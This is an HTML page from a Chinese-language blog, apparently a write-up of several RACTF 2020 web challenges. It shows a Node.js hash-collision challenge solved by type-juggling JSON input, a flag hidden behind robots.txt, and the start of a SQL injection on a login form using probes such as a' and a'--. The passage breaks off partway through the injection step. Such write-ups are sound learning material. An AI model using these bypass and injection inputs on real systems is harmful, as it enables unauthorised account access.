<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5"><title>RACTF2020 | crownZ's Blog</title><meta name="description" content="RACTF2020"><meta name="keywords" content="代码审计,Nodejs,Flask,Python,SQL注入"><meta name="author" content="crownZ"><meta name="copyright" content="crownZ"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin><link rel="preconnect" href="//busuanzi.ibruce.info"><meta name="google-site-verification" content="A2oGpKcpeHVKtuaxnARzKhD0x9h4UyHUwhMpeBZ2cHk"><meta name="baidu-site-verification" content="DRcGuvTARl"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="RACTF2020"><meta name="twitter:description" content="RACTF2020"><meta name="twitter:image" content="https://gitee.com/crownz/blog_image/raw/master/20200607182446.png"><meta property="og:type" content="article"><meta property="og:title" content="RACTF2020"><meta property="og:url" content="https://crownz-sec.github.io/2020/06/07/RACTF2020/"><meta property="og:site_name" content="crownZ's Blog"><meta property="og:description" content="RACTF2020"><meta property="og:image" content="https://gitee.com/crownz/blog_image/raw/master/20200607182446.png"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = 'false'
var t = Cookies.get("theme");
if (autoChangeMode == '1'){
const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

if (t === undefined){
  if (isLightMode) activateLightMode()
  else if (isDarkMode) activateDarkMode()
  else if (isNotSpecified || hasNoSupport){
    console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
    now = new Date();
    hour = now.getHours();
    isNight = hour < 6 || hour >= 18
    isNight ? activateDarkMode() : activateLightMode()
}
} else if (t == 'light') activateLightMode()
else activateDarkMode()


} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="https://crownz-sec.github.io/2020/06/07/RACTF2020/"><link rel="prev" title="vulnhub-DC3" href="https://crownz-sec.github.io/2020/06/09/vulnhub_DC3/"><link rel="next" title="GKCTF学习" href="https://crownz-sec.github.io/2020/05/26/GKCTF2020/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://crownz-sec.github.io/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"简"},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  isHome: false,
  isPost: true
  
}</script><meta name="generator" content="Hexo 4.2.1"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><header> <div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">crownZ's Blog</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于我</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> 清单</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> 音乐</span></a></li><li><a class="site-page" href="/gallery/"><i class="fa-fw fa fa-camera"></i><span> 相册</span></a></li></ul></div></div></span></div></header><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">24</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">28</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">12</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于我</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> 清单</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> 音乐</span></a></li><li><a class="site-page" href="/gallery/"><i class="fa-fw fa fa-camera"></i><span> 相册</span></a></li></ul></div></div></div><div id="mobile-sidebar-toc"><div class="toc_mobile_headline">目录</div><div class="sidebar-toc__content"><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#Web"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">Web</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#C0llide"><span class="toc_mobile_items-number">1.1.</span> <span class="toc_mobile_items-text">C0llide?</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#环境2"><span class="toc_mobile_items-number">1.2.</span> <span class="toc_mobile_items-text">环境2</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Quarantine-Hidden-information"><span class="toc_mobile_items-number">1.2.1.</span> <span class="toc_mobile_items-text">Quarantine - Hidden information</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Quarantine"><span class="toc_mobile_items-number">1.2.2.</span> <span class="toc_mobile_items-text">Quarantine</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Getting-admin"><span class="toc_mobile_items-number">1.2.3.</span> <span class="toc_mobile_items-text">Getting admin</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Finding-server-information-未做出"><span class="toc_mobile_items-number">1.2.4.</span> <span class="toc_mobile_items-text">Finding server information(未做出)</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#环境3"><span class="toc_mobile_items-number">1.3.</span> <span class="toc_mobile_items-text">环境3</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Entrypoint"><span class="toc_mobile_items-number">1.3.1.</span> <span class="toc_mobile_items-text">Entrypoint</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Baiting"><span class="toc_mobile_items-number">1.3.2.</span> <span class="toc_mobile_items-text">Baiting</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Admin-Attack-未做出"><span class="toc_mobile_items-number">1.3.3.</span> <span class="toc_mobile_items-text">Admin Attack(未做出)</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Vandalism-未做出"><span class="toc_mobile_items-number">1.3.4.</span> <span class="toc_mobile_items-text">Vandalism(未做出)</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Insert-witty-name-未做出"><span class="toc_mobile_items-number">1.3.5.</span> <span class="toc_mobile_items-text">Insert witty name(未做出)</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-3"><a class="toc_mobile_items-link" href="#Xtremely-Memorable-Listing"><span class="toc_mobile_items-number">1.3.6.</span> <span class="toc_mobile_items-text">Xtremely Memorable Listing</span></a></li></ol></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#Misc"><span class="toc_mobile_items-number">2.</span> <span class="toc_mobile_items-text">Misc</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#Discord"><span class="toc_mobile_items-number">2.1.</span> <span class="toc_mobile_items-text">Discord</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#OSINT"><span class="toc_mobile_items-number">3.</span> <span class="toc_mobile_items-text">OSINT</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#RAirways"><span class="toc_mobile_items-number">3.1.</span> <span class="toc_mobile_items-text">RAirways</span></a></li><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#Remote-Retreat"><span class="toc_mobile_items-number">3.2.</span> <span class="toc_mobile_items-text">Remote Retreat</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#Cryptography"><span class="toc_mobile_items-number">4.</span> <span class="toc_mobile_items-text">Cryptography</span></a><ol class="toc_mobile_items-child"><li class="toc_mobile_items-item toc_mobile_items-level-2"><a class="toc_mobile_items-link" href="#Really-Simple-Algorithm"><span class="toc_mobile_items-number">4.1.</span> <span class="toc_mobile_items-text">Really Simple Algorithm</span></a></li></ol></li><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#后记"><span class="toc_mobile_items-number">5.</span> <span class="toc_mobile_items-text">后记</span></a></li></ol></div></div></div><div id="body-wrap"><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true">     </i><div id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-number">1.</span> <span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#C0llide"><span class="toc-number">1.1.</span> <span class="toc-text">C0llide?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#环境2"><span class="toc-number">1.2.</span> <span class="toc-text">环境2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Quarantine-Hidden-information"><span class="toc-number">1.2.1.</span> <span class="toc-text">Quarantine - Hidden information</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Quarantine"><span class="toc-number">1.2.2.</span> <span class="toc-text">Quarantine</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Getting-admin"><span class="toc-number">1.2.3.</span> <span class="toc-text">Getting admin</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Finding-server-information-未做出"><span class="toc-number">1.2.4.</span> <span class="toc-text">Finding server information(未做出)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#环境3"><span class="toc-number">1.3.</span> <span class="toc-text">环境3</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Entrypoint"><span class="toc-number">1.3.1.</span> <span class="toc-text">Entrypoint</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Baiting"><span class="toc-number">1.3.2.</span> <span class="toc-text">Baiting</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Admin-Attack-未做出"><span class="toc-number">1.3.3.</span> <span class="toc-text">Admin Attack(未做出)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Vandalism-未做出"><span class="toc-number">1.3.4.</span> <span class="toc-text">Vandalism(未做出)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Insert-witty-name-未做出"><span class="toc-number">1.3.5.</span> <span class="toc-text">Insert witty name(未做出)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Xtremely-Memorable-Listing"><span class="toc-number">1.3.6.</span> <span class="toc-text">Xtremely Memorable Listing</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Misc"><span class="toc-number">2.</span> <span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Discord"><span class="toc-number">2.1.</span> <span class="toc-text">Discord</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#OSINT"><span class="toc-number">3.</span> <span class="toc-text">OSINT</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#RAirways"><span class="toc-number">3.1.</span> <span class="toc-text">RAirways</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Remote-Retreat"><span class="toc-number">3.2.</span> <span class="toc-text">Remote Retreat</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Cryptography"><span class="toc-number">4.</span> <span class="toc-text">Cryptography</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Really-Simple-Algorithm"><span class="toc-number">4.1.</span> <span class="toc-text">Really Simple Algorithm</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#后记"><span class="toc-number">5.</span> <span class="toc-text">后记</span></a></li></ol></div></div></div><main id="content-outer"><div id="top-container" style="background-image: url(https://gitee.com/crownz/blog_image/raw/master/20200607182446.png)"><div id="post-info"><div id="post-title"><div class="posttitle">RACTF2020</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 发表于 2020-06-07<span class="post-meta__separator">|</span><i class="fa fa-history fa-fw" aria-hidden="true"></i> 更新于 2020-06-21</time><span class="post-meta__separator">|</span><span><i class="fa fa-inbox post-meta__icon fa-fw" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF/">CTF</a></span><div class="post-meta-wordcount"><i class="fa fa-file-word-o post-meta__icon fa-fw" aria-hidden="true"></i><span>字数总计:</span><span class="word-count">1.4k</span><span class="post-meta__separator">|</span><i class="fa fa-clock-o post-meta__icon fa-fw" aria-hidden="true"></i><span>阅读时长: 5 分钟</span><div class="post-meta-pv-cv"><span class="post-meta__separator">|</span><span><i class="fa fa-eye post-meta__icon fa-fw" aria-hidden="true"> </i>阅读量:</span><span id="busuanzi_value_page_pv"></span></div></div></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><html><head></head><body><blockquote>
<p>首次参加国外CTF，图个新鲜和乐呵。还是偶然间在<a href="https://www.ctfhub.com/#/calendar" target="_blank" rel="noopener">ctfhub-ctf时间表</a>上看到的，挺有意思的。贴个<a href="https://ractf.co.uk/" target="_blank" rel="noopener">链接</a>，以供来年参加。</p>
</blockquote>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="C0llide"><a href="#C0llide" class="headerlink" title="C0llide?"></a>C0llide?</h2><p>提示：A target service is asking for two bits of information that have the same “custom hash”, but can’t be identical. Looks like we’re going to have to generate a collision?</p>
<p>翻译：目标服务请求具有相同“自定义散列”的两位信息，但不能完全相同。看起来我们要产生碰撞了?</p>
<p>题目直接给出了代码，是nodejs的。因为nodejs对于可能在web中不太常见（至少对我来说是这样），一些题可能就是直接给出一小段代码，然后去考察小的漏洞知识点，就像最近GKCTF中的EzNode。这里把获取flag的方式都给出来了，下来就看怎么达到获取flag的要求了。</p>
<pre class="line-numbers language-js"><code class="language-js"><span class="token keyword">const</span> bodyParser <span class="token operator">=</span> <span class="token function">require</span><span class="token punctuation">(</span><span class="token string">"body-parser"</span><span class="token punctuation">)</span>
<span class="token keyword">const</span> express <span class="token operator">=</span> <span class="token function">require</span><span class="token punctuation">(</span><span class="token string">"express"</span><span class="token punctuation">)</span>
<span class="token keyword">const</span> fs <span class="token operator">=</span> <span class="token function">require</span><span class="token punctuation">(</span><span class="token string">"fs"</span><span class="token punctuation">)</span>
<span class="token keyword">const</span> customhash <span class="token operator">=</span> <span class="token function">require</span><span class="token punctuation">(</span><span class="token string">"./customhash"</span><span class="token punctuation">)</span>

<span class="token keyword">const</span> app <span class="token operator">=</span> <span class="token function">express</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
app<span class="token punctuation">.</span><span class="token function">use</span><span class="token punctuation">(</span>bodyParser<span class="token punctuation">.</span><span class="token function">json</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>    <span class="token comment" spellcheck="true">//json解析</span>

<span class="token keyword">const</span> port <span class="token operator">=</span> <span class="token number">3000</span>
<span class="token keyword">const</span> flag <span class="token operator">=</span> <span class="token string">"flag"</span>
<span class="token keyword">const</span> secret_key <span class="token operator">=</span> <span class="token string">"Y0ure_g01nG_t0_h4v3_t0_go_1nto_h4rdc0r3_h4ck1ng_m0d3"</span>

app<span class="token punctuation">.</span><span class="token keyword">get</span><span class="token punctuation">(</span><span class="token string">'/'</span><span class="token punctuation">,</span> <span class="token punctuation">(</span>req<span class="token punctuation">,</span> res<span class="token punctuation">)</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token punctuation">{</span>
    console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token string">"[-] Source view"</span><span class="token punctuation">)</span>
    res<span class="token punctuation">.</span><span class="token function">type</span><span class="token punctuation">(</span><span class="token string">"text"</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> fs<span class="token punctuation">.</span><span class="token function">readFile</span><span class="token punctuation">(</span><span class="token string">"index.js"</span><span class="token punctuation">,</span> <span class="token punctuation">(</span>err<span class="token punctuation">,</span>data<span class="token punctuation">)</span> <span class="token operator">=</span><span class="token operator">></span> res<span class="token punctuation">.</span><span class="token function">send</span><span class="token punctuation">(</span>data<span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">replace</span><span class="token punctuation">(</span>flag<span class="token punctuation">,</span> <span class="token string">"flag"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span>

app<span class="token punctuation">.</span><span class="token function">post</span><span class="token punctuation">(</span><span class="token string">'/getflag'</span><span class="token punctuation">,</span> <span class="token punctuation">(</span>req<span class="token punctuation">,</span> res<span class="token punctuation">)</span> <span class="token operator">=</span><span class="token operator">></span> <span class="token punctuation">{</span>
    console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token string">"[-] Getflag post"</span><span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>req<span class="token punctuation">.</span>body<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token keyword">return</span> res<span class="token punctuation">.</span><span class="token function">send</span><span class="token punctuation">(</span><span class="token string">"400"</span><span class="token punctuation">)</span><span class="token punctuation">}</span>
    <span class="token keyword">let</span> one <span class="token operator">=</span> req<span class="token punctuation">.</span>body<span class="token punctuation">.</span>one
    <span class="token keyword">let</span> two <span class="token operator">=</span> req<span class="token punctuation">.</span>body<span class="token punctuation">.</span>two
    console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span>req<span class="token punctuation">.</span>body<span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>one <span class="token operator">||</span> <span class="token operator">!</span>two<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> res<span class="token punctuation">.</span><span class="token function">send</span><span class="token punctuation">(</span><span class="token string">"400"</span><span class="token punctuation">)</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>one<span class="token punctuation">.</span>length <span class="token operator">!==</span> two<span class="token punctuation">.</span>length<span class="token punctuation">)</span> <span class="token operator">||</span> <span class="token punctuation">(</span>one <span class="token operator">===</span> two<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> res<span class="token punctuation">.</span><span class="token function">send</span><span class="token punctuation">(</span><span class="token string">"Strings are either too different or not different enough"</span><span class="token punctuation">)</span>
    <span class="token punctuation">}</span>
    one <span class="token operator">=</span> customhash<span class="token punctuation">.</span><span class="token function">hash</span><span class="token punctuation">(</span>secret_key <span class="token operator">+</span> one<span class="token punctuation">)</span>
    two <span class="token operator">=</span> customhash<span class="token punctuation">.</span><span class="token function">hash</span><span class="token punctuation">(</span>secret_key <span class="token operator">+</span> two<span class="token punctuation">)</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>one <span class="token operator">==</span> two<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token string">"[*] Flag get!"</span><span class="token punctuation">)</span>
        <span class="token keyword">return</span> res<span class="token punctuation">.</span><span class="token function">send</span><span class="token punctuation">(</span>flag<span class="token punctuation">)</span>
    <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> res<span class="token punctuation">.</span><span class="token function">send</span><span class="token punctuation">(</span><span class="token template-string"><span class="token string">`</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">${</span>one<span class="token interpolation-punctuation punctuation">}</span></span><span class="token string"> did not match </span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">${</span>two<span class="token interpolation-punctuation punctuation">}</span></span><span class="token string">!`</span></span><span class="token punctuation">)</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span>

app<span class="token punctuation">.</span><span class="token function">listen</span><span class="token punctuation">(</span>port<span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">=</span><span class="token operator">></span> console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token template-string"><span class="token string">`Listening on port </span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">${</span>port<span class="token interpolation-punctuation punctuation">}</span></span><span class="token string">`</span></span><span class="token punctuation">)</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>看完代码再结合提示，就可以知道题目想要我们产生碰撞。首先，需要传两个参数one和two；然后，两个参数长度必须相等但内容不相等（三个=）；最后，两参数分别加上secret_key，被customhash.hash()函数处理，如果处理结果相等（两个=），就可以得到flag。这里的==和===类似于php，==可以忽略类型，===要求值和类型都必须相同。</p>
<p>刚开始，以为漏洞点存在于customhash.hash()这个函数。但我找了一会儿，发现找不到这个东西的poc，再看下它的代码是本地包含的，看来是自己写的hash。然后发现走错方向了，在看那个==和===的区别，发现应该是利用nodejs的字符比较特性来解题的，最后在这篇<a href="https://xz.aliyun.com/t/7752#toc-3" target="_blank" rel="noopener">博客</a>找到了答案。</p>
<p>学习后，构造[6, 6]和[“6”, “6”]。（后面的[6]和[“6”]都一样，没差别）</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200607205435.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200607205435.png" class="lazyload" title></a></p>
<p>至此为此，我的思路都对，已经可以解出来了。但是我在在post传json数据上面栽了坑，一直在尝试最常用的post传参数，结果就是一直传不过去。后面在本地调试后，知道了req请求体一直为空。心想代码总不可能有问题吧，然后就去谷歌了nodejs怎么post传不过去数据。得知传不过去，必定是方式有问题，才改成了post传json数据。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200607220414.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200607220414.png" class="lazyload" title></a></p>
<p>在改成传json数据数据之后，仍然出了点小问题，我把one和two的值都用引号括起来了，这样就造成它们被解析为字符串了。one的值为”[6]”，长度为3；tow的值为”[“6”]”，长度为5，这样就过不去第二个判断了。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200607221146.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200607221146.png" class="lazyload" title></a></p>
<p>又经过本地调试几次，才知道要把引号给去了。想传什么类型的值，直接传就好，数字和数组都不用加引号。最终的payload为json格式的数据，并选择hackbar的数据格式为application/json。执行，得到flag。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200607220128.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200607220128.png" class="lazyload" title></a></p>
<p><del>踩坑踩到我想死，基础薄弱啊</del>。</p>
<h2 id="环境2"><a href="#环境2" class="headerlink" title="环境2"></a>环境2</h2><h3 id="Quarantine-Hidden-information"><a href="#Quarantine-Hidden-information" class="headerlink" title="Quarantine - Hidden information"></a>Quarantine - Hidden information</h3><p>题目：Challenge instance ready at .<code>95.216.233.106:41794</code>.</p>
<p>提示：We think there’s a file they don’t want people to see hidden somewhere! See if you can find it, it’s gotta be on their webapp somewhere…</p>
<p>根据提示，想到robots.txt。访问一下，看到提示。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200607223347.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200607223347.png" class="lazyload" title></a></p>
<p>访问/admin-stash，得到flag。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200607223435.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200607223435.png" class="lazyload" title></a></p>
<p>送分题？？？</p>
<h3 id="Quarantine"><a href="#Quarantine" class="headerlink" title="Quarantine"></a>Quarantine</h3><p>提示：See if you can get access to an account on the webapp.</p>
<p>环境仍然是上面的环境，但是有不同的要求，要获取账户访问权限。登录界面如下。</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608220614.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608220614.png" class="lazyload" title></a></p>
<p>在登录框输入用户名a’和密码123，看到报错</p>
<p><a href="https://gitee.com/crownz/blog_image/raw/master/20200608221007.png" target="_blank" rel="noopener" data-fancybox="group" data-caption class="fancybox"><img alt data-src="https://gitee.com/crownz/blog_image/raw/master/20200608221007.png" class="lazyload" title></a></p>
<p>输入用户名a’–和密码123，看到回显不可用的账户或密码，证明存在注入。这里的–为sqlite的注释符，直接这样想，是因为下面有道题目同样是flask框架，看着环境近乎一样，这里就也猜想他用的库为sqlite。</p>
